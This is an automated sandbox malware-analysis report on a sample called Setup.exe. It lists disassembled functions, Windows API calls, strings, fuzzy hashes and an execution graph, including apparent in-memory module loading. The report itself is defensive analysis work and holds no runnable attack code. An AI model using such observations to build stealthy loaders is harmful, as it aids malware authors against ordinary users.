                                                                                                                                                                                                            control_flow_graph 177 401180-401197 GetModuleFileNameA 178 4011b0-4011b5 177->178 179 401199-4011af GetLastError call 401000 177->179 181 4011b8-4011bd 178->181 181->181 183 4011bf-4011c4 181->183 184 4011e4 183->184 185 4011c6-4011e2 strncmp 183->185 186 4011e9-4011ee 184->186 185->184 185->186 187 4011f0-4011f8 186->187 187->187 188 4011fa-401212 strrchr 187->188
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe,00000304,00401245,?,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 0040118F
                                                                                                                                                                                                            • GetLastError.KERNEL32(Retrieving module name,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 0040119E
                                                                                                                                                                                                              • Part of subcall function 00401000: FormatMessageA.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000), ref: 00401024
                                                                                                                                                                                                              • Part of subcall function 00401000: strncpy.MSVCR90 ref: 00401038
                                                                                                                                                                                                              • Part of subcall function 00401000: LocalFree.KERNEL32(?), ref: 00401046
                                                                                                                                                                                                              • Part of subcall function 00401000: lstrlenA.KERNEL32(00000000), ref: 00401058
                                                                                                                                                                                                              • Part of subcall function 00401000: _snprintf.MSVCR90 ref: 00401073
                                                                                                                                                                                                              • Part of subcall function 00401000: GetFocus.USER32 ref: 00401085
                                                                                                                                                                                                              • Part of subcall function 00401000: MessageBoxA.USER32(00000000), ref: 0040108C
                                                                                                                                                                                                            • strncmp.MSVCR90 ref: 004011D2
                                                                                                                                                                                                            • strrchr.MSVCR90 ref: 00401201
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$ErrorFileFocusFormatFreeLastLocalModuleName_snprintflstrlenstrncmpstrncpystrrchr
                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Roaming\FeGIPCnK$C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe$Retrieving module name$\\?\
                                                                                                                                                                                                            • API String ID: 3478746248-3616565791
                                                                                                                                                                                                            • Opcode ID: 1c63dc24383a6b44afdcbb7e344813abb8cf198e7691c487b9f7923b4337fbf4
                                                                                                                                                                                                            • Instruction ID: 91c1268eff9de99491df4014b82af4a7232e339c9bbb35131923ff5da035fb76
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c63dc24383a6b44afdcbb7e344813abb8cf198e7691c487b9f7923b4337fbf4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E201ADB06406405BE3011BB95E1AB173A849B59B0AF1A8072FB46FF2E2DA7DC914865D
                                                                                                                                                                                                            Function 00401B90 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 58COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 189 401b90-401bb1 192 401bf0-401c07 call 401aa0 getenv 189->192 193 401bb3-401bc5 189->193 197 401c35-401c3f 192->197 198 401c09-401c22 __iob_func 192->198 200 401be7-401bed call 401c40 193->200 201 401bc7-401bd6 193->201 198->197 204 401c24-401c32 __iob_func 198->204 200->192 201->200 209 401bd8-401be4 201->209 204->197 209->200
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __iob_func$getenv
                                                                                                                                                                                                            • String ID: <stdin>$<stdin>$PYTHONINSPECT$path
                                                                                                                                                                                                            • API String ID: 952159037-346035110
                                                                                                                                                                                                            • Opcode ID: 38fc9347ebd0b39b6a251194a392424c584476c304bd1f4b767da579e09a30c7
                                                                                                                                                                                                            • Instruction ID: 3a0cd90c33e045019f3d85b4f9523035d4d057a98ccbf2b2234be1e6514390f9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 38fc9347ebd0b39b6a251194a392424c584476c304bd1f4b767da579e09a30c7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F018471A41710ABD61027B5AF0DB1F3A68DF41752F080036FD05F62A1EA39D924CEBE
                                                                                                                                                                                                            Function 00401000 Relevance: 10.5, APIs: 7, Instructions: 46windowstringCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 211 401000-40100c 212 40104e 211->212 213 40100e-40104c FormatMessageA strncpy LocalFree 211->213 214 401053-401098 lstrlenA _snprintf GetFocus MessageBoxA 212->214 213->214
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000), ref: 00401024
                                                                                                                                                                                                            • strncpy.MSVCR90 ref: 00401038
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 00401046
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 00401058
                                                                                                                                                                                                            • _snprintf.MSVCR90 ref: 00401073
                                                                                                                                                                                                            • GetFocus.USER32 ref: 00401085
                                                                                                                                                                                                            • MessageBoxA.USER32(00000000), ref: 0040108C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$FocusFormatFreeLocal_snprintflstrlenstrncpy
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2324749726-0
                                                                                                                                                                                                            • Opcode ID: 5c360f393e6a0c1135d57203a577ae5badcfff9240942876dcb77ff3ee984539
                                                                                                                                                                                                            • Instruction ID: d54df7ba943514a9ed245f917b7b029d9917e2ae8cd7c94c82d9e9a5e8dc25a3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c360f393e6a0c1135d57203a577ae5badcfff9240942876dcb77ff3ee984539
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A20140F5514300BFE314ABA4DD4DF9B77A8ABC4704F00C828B789B61D1DA78D459C76A
                                                                                                                                                                                                            Function 00401A50 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 21COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 215 401a50-401a60 getenv 216 401a90 215->216 217 401a62-401a7c __iob_func 215->217 216->216 219 401a7e-401a8c __iob_func 217->219 220 401a8f 217->220 219->220 220->216
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __iob_func$getenv
                                                                                                                                                                                                            • String ID: <stdin>$<stdin>$PYTHONINSPECT
                                                                                                                                                                                                            • API String ID: 952159037-3944695568
                                                                                                                                                                                                            • Opcode ID: 70635a653a20398afb8323c1779619fc8e2f8c30ff46a45be12a8d071d852709
                                                                                                                                                                                                            • Instruction ID: 8cca01e1b034a1b8fc333b74f5ab705df7888345169281b2be04b1cf812c368c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70635a653a20398afb8323c1779619fc8e2f8c30ff46a45be12a8d071d852709
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61E0C270E417119BDA0057F86F0DA1B3A2CDD05352B080077EC09F21E0DA78D864CEBE
                                                                                                                                                                                                            Function 004023A0 Relevance: 9.1, APIs: 6, Instructions: 149libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 222 4023a0-4023bd 223 4023c3-4023d3 IsBadReadPtr 222->223 224 402507-40250d 222->224 225 4023d9 223->225 226 4024ff-402506 223->226 227 4023e0-4023e5 225->227 228 4023eb-4023fb call 401ea0 227->228 229 40250e-402518 227->229 232 402401-40241e realloc 228->232 233 4024e7-4024ee 228->233 234 402424-402432 232->234 235 4024ef-4024fe SetLastError 232->235 236 402434-40243d 234->236 237 40243f-402444 234->237 238 402446-40244a 236->238 237->238 239 4024b6-4024c4 IsBadReadPtr 238->239 240 40244c 238->240 239->229 243 4024c6-4024ce 239->243 241 40247a-402489 240->241 242 40244e-40245b 240->242 244 40249b 241->244 245 40248b 241->245 246 40246b-40246c 242->246 247 40245d 242->247 243->227 249 40249c-40249d GetProcAddress 244->249 248 402490-402492 245->248 246->249 250 402460-402462 247->250 251 4024d3-4024dd call 402230 248->251 252 402494-402499 248->252 253 4024a3-4024a7 249->253 254 402464-402469 250->254 255 40246e-402478 call 402230 250->255 251->253 252->244 252->248 256 4024a9-4024b4 253->256 257 4024df-4024e1 SetLastError 253->257 254->246 254->250 255->253 256->239 256->240 257->233
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 004023CB
                                                                                                                                                                                                              • Part of subcall function 00401EA0: _stricmp.MSVCR90(004018FF,?,00000000,00000001,?,004023F3,004018FF,?,00402680,00000000), ref: 00401EBC
                                                                                                                                                                                                              • Part of subcall function 00401EA0: free.MSVCR90 ref: 00401EF0
                                                                                                                                                                                                            • realloc.MSVCR90 ref: 00402410
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000002), ref: 0040249D
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 004024BC
                                                                                                                                                                                                            • SetLastError.KERNEL32(0000007F), ref: 004024E1
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000008), ref: 004024F1
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLastRead$AddressProc_stricmpfreerealloc
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3829280425-0
                                                                                                                                                                                                            • Opcode ID: c1f4c7903eaecf4131432c3de378eb7ae882ce9fef0bb03a0e17263d17549ce1
                                                                                                                                                                                                            • Instruction ID: e06c3e0f55c1ce49f3d5eeedbd59607cc003002fbce32c9cbadbe966566b4b56
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1f4c7903eaecf4131432c3de378eb7ae882ce9fef0bb03a0e17263d17549ce1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4941C6723012059BD7149F14ED88B6BB364FB80365F14417BF906E73D1E7B8E8158A59
                                                                                                                                                                                                            Function 00401D60 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 262 401d60-401d6c 263 401d7d-401d90 call 402520 262->263 264 401d6e-401d73 call 401cb0 262->264 269 401d92-401d99 263->269 270 401de9-401ded 263->270 267 401d78-401d7c 264->267 271 401dbb-401dc2 269->271 272 401d9b 269->272 273 401da0-401db1 call 402230 272->273 276 401dc3-401de6 OutputDebugStringA __iob_func fprintf 273->276 277 401db3-401db9 273->277 276->270 277->271 277->273
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                            • String ID: undef symbol$undefined symbol %s -> exit(-1)
                                                                                                                                                                                                            • API String ID: 310444273-3880521481
                                                                                                                                                                                                            • Opcode ID: f28070308f0c5a66d053ef89d1ff9b282d5ce64fd2970f6b05dc0e2cfe902d45
                                                                                                                                                                                                            • Instruction ID: ce5dc5e057ab4e2a43885ee57fcd922f747e18a9ab2ef1d2ec3eba6c30d75da0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f28070308f0c5a66d053ef89d1ff9b282d5ce64fd2970f6b05dc0e2cfe902d45
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B01D872900201ABE7106B68FD44A9773E8DFC0355F14443FF844E62E0E63CD8D18A69
                                                                                                                                                                                                            Function 00401660 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43stringCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 278 401660-401669 279 401670-401675 278->279 279->279 280 401677-401689 279->280 281 4016a2-4016aa 280->281 282 40168b-40168d 280->282 284 4016cc 281->284 285 4016ac-4016ca strncpy 281->285 283 401690-401693 282->283 283->281 286 401695-4016a0 283->286 287 4016d3-4016ef GetFullPathNameA 284->287 285->287 286->281 286->283
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • strncpy.MSVCR90 ref: 004016BA
                                                                                                                                                                                                            • GetFullPathNameA.KERNEL32(00406580,00000104,00406580,004019BA,6F8AF18A,?,004019BA), ref: 004016E7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FullNamePathstrncpy
                                                                                                                                                                                                            • String ID: ^@$ ^@$C:\Users\user\AppData\Roaming\FeGIPCnK\common.bin
                                                                                                                                                                                                            • API String ID: 567410384-2214022839
                                                                                                                                                                                                            • Opcode ID: cd1a6e09d00ee151c9fa4b3db23d9f46a47509955db2e1ef7978f412654ecde5
                                                                                                                                                                                                            • Instruction ID: 0003fd1b2bd6f8a6e0c4509e74986bfdb13ef7a1d1aa951a95ab66f08de7795f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd1a6e09d00ee151c9fa4b3db23d9f46a47509955db2e1ef7978f412654ecde5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D01B5B14042409FC310CB24FC1CB977794E744300F99487BE48AFB2D4E77A55288B9D
                                                                                                                                                                                                            Function 004017D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 108COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 288 4017d0-4017d5 289 4017d8-4017dd 288->289 289->289 290 4017df-4017ed 289->290 291 4017f0-4017f5 290->291 291->291 292 4017f7-40180b malloc 291->292 293 401822-40182b 292->293 294 40180d-401821 call 401000 292->294 296 401830-401838 293->296 296->296 298 40183a-40183f 296->298 299 401841-401846 298->299 299->299 300 401848-40184f 299->300 301 401850-401856 300->301 301->301 302 401858-40186d 301->302 303 401870-401875 302->303 303->303 304 401877-40187e 303->304 305 401880-401886 304->305 305->305 306 401888-4018b1 305->306 309 4018b3-4018c1 call 401c40 306->309 310 4018c4-4018d3 free 306->310 309->310
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: freemalloc
                                                                                                                                                                                                            • String ID: ,R@$no mem for late sys.path$path
                                                                                                                                                                                                            • API String ID: 3061335427-4293072127
                                                                                                                                                                                                            • Opcode ID: c4401dd601d074f02072bd3f5982eeff70958d79786ea3440c8d628079098a5a
                                                                                                                                                                                                            • Instruction ID: e471e226a36cf7089748808a910ea1bc09ef1ea7ee1f164221155ef36efc28ae
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4401dd601d074f02072bd3f5982eeff70958d79786ea3440c8d628079098a5a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 013149326005061BC70656386C285B77BD5DF95344318817AFC8BEB3A1EE36DD0A87C8
                                                                                                                                                                                                            Function 00401F60 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 68memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00000000,?,?,00402665,?,?,00000000), ref: 00401FB2
                                                                                                                                                                                                            • memset.MSVCR90 ref: 00401FBB
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00000000,?,?,00402665,?,?,00000000), ref: 00401FD0
                                                                                                                                                                                                            • memcpy.MSVCR90(00000000,e&@,00000000,?,00402665,?,?,00000000), ref: 00401FE0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocVirtual$memcpymemset
                                                                                                                                                                                                            • String ID: e&@
                                                                                                                                                                                                            • API String ID: 2542864682-73339501
                                                                                                                                                                                                            • Opcode ID: b1dbb98a8a60990327667ccfc5cfeecd8a2b1543ff788c04fafa38dddfff8afb
                                                                                                                                                                                                            • Instruction ID: cabd134ca6f8edb0e33f6498aa80dca311541fbb15500bccbc1fa9ad8072609d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1dbb98a8a60990327667ccfc5cfeecd8a2b1543ff788c04fafa38dddfff8afb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C61108B16043019FD314DF59CD80F2AB3E5EF88754F15482EF685AB391D674E841CB65

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:2.1%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                            Signature Coverage:2.5%
                                                                                                                                                                                                            Total number of Nodes:1712
                                                                                                                                                                                                            Total number of Limit Nodes:25
                                                                                                                                                                                                            execution_graph 19887 7ff764a1f388 19888 7ff764a1f396 19887->19888 19890 7ff764a1f3ae sscanf 19887->19890 19889 7ff764a2681c _get_daylight 14 API calls 19888->19889 19891 7ff764a1f39b 19889->19891 19890->19888 19892 7ff764a1f3c0 19890->19892 19893 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 19891->19893 19900 7ff764a2f528 EnterCriticalSection 19892->19900 19895 7ff764a1f3a6 19893->19895 20121 7ff764a318cc 20122 7ff764a31ab4 20121->20122 20124 7ff764a3190f _isindst 20121->20124 20123 7ff764a2681c _get_daylight 14 API calls 20122->20123 20125 7ff764a31aa6 _handle_error 20123->20125 20124->20122 20126 7ff764a3198b _isindst 20124->20126 20140 7ff764a36d4c 20126->20140 20130 7ff764a31ae0 20133 7ff764a2b4a0 _isindst 9 API calls 20130->20133 20135 7ff764a31af4 20133->20135 20138 7ff764a319e8 20138->20125 20164 7ff764a36d8c 20138->20164 20141 7ff764a36d5a 20140->20141 20142 7ff764a319a9 20140->20142 20171 7ff764a2f528 EnterCriticalSection 20141->20171 20146 7ff764a36148 20142->20146 20147 7ff764a319be 20146->20147 20148 7ff764a36151 20146->20148 20147->20130 20152 7ff764a36178 20147->20152 20149 7ff764a2681c _get_daylight 14 API calls 20148->20149 20150 7ff764a36156 20149->20150 20151 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 20150->20151 20151->20147 20153 7ff764a319cf 20152->20153 20154 7ff764a36181 20152->20154 20153->20130 20158 7ff764a361a8 20153->20158 20155 7ff764a2681c _get_daylight 14 API calls 20154->20155 20156 7ff764a36186 20155->20156 20157 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 20156->20157 20157->20153 20159 7ff764a319e0 20158->20159 20160 7ff764a361b1 20158->20160 20159->20130 20159->20138 20161 7ff764a2681c _get_daylight 14 API calls 20160->20161 20162 7ff764a361b6 20161->20162 20163 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 20162->20163 20163->20159 20172 7ff764a2f528 EnterCriticalSection 20164->20172 20182 7ff764a1a6c0 20183 7ff764a1a6d0 20182->20183 20199 7ff764a28128 20183->20199 20185 7ff764a1a6dc 20205 7ff764a1ad08 20185->20205 20187 7ff764a1afe4 7 API calls 20189 7ff764a1a775 20187->20189 20188 7ff764a1a6f4 _RTC_Initialize 20197 7ff764a1a749 20188->20197 20210 7ff764a1aeb8 20188->20210 20191 7ff764a1a709 20213 7ff764a27e5c 20191->20213 20197->20187 20198 7ff764a1a765 20197->20198 20200 7ff764a28139 20199->20200 20201 7ff764a28141 20200->20201 20202 7ff764a2681c _get_daylight 14 API calls 20200->20202 20201->20185 20203 7ff764a28150 20202->20203 20204 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 20203->20204 20204->20201 20206 7ff764a1ad19 20205->20206 20209 7ff764a1ad1e __scrt_release_startup_lock 20205->20209 20207 7ff764a1afe4 7 API calls 20206->20207 20206->20209 20208 7ff764a1ad92 20207->20208 20209->20188 20245 7ff764a1ae7c 20210->20245 20212 7ff764a1aec1 20212->20191 20214 7ff764a27e7c 20213->20214 20243 7ff764a1a715 20213->20243 20215 7ff764a27e9a 20214->20215 20216 7ff764a27e84 20214->20216 20218 7ff764a2e580 36 API calls 20215->20218 20217 7ff764a2681c _get_daylight 14 API calls 20216->20217 20220 7ff764a27e89 20217->20220 20219 7ff764a27e9f 20218->20219 20260 7ff764a32430 GetModuleFileNameW 20219->20260 20222 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 20220->20222 20222->20243 20223 7ff764a27eb6 20270 7ff764a27c3c 20223->20270 20226 7ff764a27dfc 14 API calls 20227 7ff764a27f09 20226->20227 20228 7ff764a27f29 20227->20228 20229 7ff764a27f11 20227->20229 20230 7ff764a27c3c 26 API calls 20228->20230 20231 7ff764a2681c _get_daylight 14 API calls 20229->20231 20236 7ff764a27f45 20230->20236 20232 7ff764a27f16 20231->20232 20234 7ff764a2b560 __free_lconv_mon 14 API calls 20232->20234 20233 7ff764a27f4b 20235 7ff764a2b560 __free_lconv_mon 14 API calls 20233->20235 20234->20243 20235->20243 20236->20233 20237 7ff764a27f77 20236->20237 20238 7ff764a27f90 20236->20238 20239 7ff764a2b560 __free_lconv_mon 14 API calls 20237->20239 20241 7ff764a2b560 __free_lconv_mon 14 API calls 20238->20241 20240 7ff764a27f80 20239->20240 20242 7ff764a2b560 __free_lconv_mon 14 API calls 20240->20242 20241->20233 20242->20243 20243->20197 20244 7ff764a1af90 InitializeSListHead 20243->20244 20246 7ff764a1ae96 20245->20246 20248 7ff764a1ae8f 20245->20248 20249 7ff764a28750 20246->20249 20248->20212 20252 7ff764a2839c 20249->20252 20259 7ff764a2f528 EnterCriticalSection 20252->20259 20261 7ff764a3248a 20260->20261 20262 7ff764a32476 GetLastError 20260->20262 20264 7ff764a1d120 sscanf 26 API calls 20261->20264 